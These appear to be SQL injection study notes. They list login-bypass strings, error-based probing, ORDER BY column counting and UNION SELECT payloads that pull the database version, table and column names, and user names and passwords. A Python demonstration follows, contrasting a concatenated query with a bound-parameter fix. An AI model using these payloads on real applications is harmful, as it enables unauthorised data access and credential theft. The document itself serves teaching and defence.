' or '1'='1
' OR '1'='1' --
' OR '1'='1' ({
' OR '1'='1' /*

Error based Enumeration: (ID parameter in url is not sanitised.)

Simply add a quote ' or double quote " after the id parameter. The quote or double quote breaks the SQL query and produces an error, the detail of which depends on application verbosity:
'

Gather information on table structure

Examine the error message. This can be done by appending an ORDER BY clause to the query:
' ORDER BY 1--
' ORDER BY 2--
' ORDER BY 3--
' ORDER BY 4--
' ORDER BY 5--
' ORDER BY 6--

Increase the column count until an error message is received. The error means that the column number is not found/does not exist. Using this technique allows us to know the number of columns so we can use union statements to expose data from the database.

Union Select
' UNION SELECT 1,2,3,4,5,6--

Enumerate Version Number
' UNION SELECT 1,2,3,4,@@version,6--
Version number will be printed out in field 5 of the table.

Get Current User
' UNION SELECT 1,2,3,4,user(),6--
Current user will be printed out in field 5 of the table.

Enumerate Tables and Column Structures

This is done to better target the data which we wish to extract. The following prints out all of the table names of all the databases on this server:
' UNION ALL SELECT 1,2,3,4,table_name,6 FROM information_schema.tables--

Target a specific table (e.g. users) and display its column names:
' UNION ALL SELECT 1,2,3,4,column_name,6 FROM information_schema.columns where table_name='users'--

Extract name and password values from the users table:
' UNION SELECT 1,2,name,4,password,6 FROM users--
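
Added example (not part of the original notes): the inputs listed above run against a query built by string concatenation and against the same query with a bound parameter, to show why the unsanitised id parameter is the root cause and what the fix looks like. It uses Python's sqlite3 as a stand-in database; the six-column `products` table, the `users` row and all function names are constructed assumptions.

```python
import sqlite3

def make_db():
    """Constructed sample data; six columns to match the column count used above."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products (id INTEGER, c2, c3, c4, c5, c6);
        INSERT INTO products VALUES (1, 'a', 'widget', 'b', 'blue', 'c');
        INSERT INTO products VALUES (2, 'a', 'gadget', 'b', 'red', 'c');
        CREATE TABLE users (name TEXT, password TEXT);
        INSERT INTO users VALUES ('alice', 'constructed-hash');
    """)
    return db

def lookup_vulnerable(db, raw_id):
    # The 'before': the id parameter becomes part of the SQL text.
    sql = "SELECT * FROM products WHERE id = '" + raw_id + "'"
    return db.execute(sql).fetchall()

def lookup_bound(db, raw_id):
    # The fix: the value is sent as a bound parameter and is only ever data.
    return db.execute("SELECT * FROM products WHERE id = ?", (raw_id,)).fetchall()

def lookup_hardened(db, raw_id):
    # Defence in depth: reject anything that is not a plain decimal id, then bind.
    if not (raw_id.isascii() and raw_id.isdigit()):
        raise ValueError("id must be a decimal integer")
    return lookup_bound(db, int(raw_id))

def compare(db, raw_id):
    """Return (vulnerable result or error text, bound result) for one input."""
    try:
        vuln = lookup_vulnerable(db, raw_id)
    except sqlite3.Error as exc:
        vuln = "SQL error: " + str(exc)
    return vuln, lookup_bound(db, raw_id)

if __name__ == "__main__":
    db = make_db()
    for raw_id in ["1", "'", "' OR '1'='1", "' ORDER BY 7--",
                   "' UNION SELECT 1,2,name,4,password,6 FROM users--"]:
        print(repr(raw_id), "->", compare(db, raw_id))
```

With the bound parameter every input is compared against the id column as a literal value, so no error text or extra rows come back for the application to display.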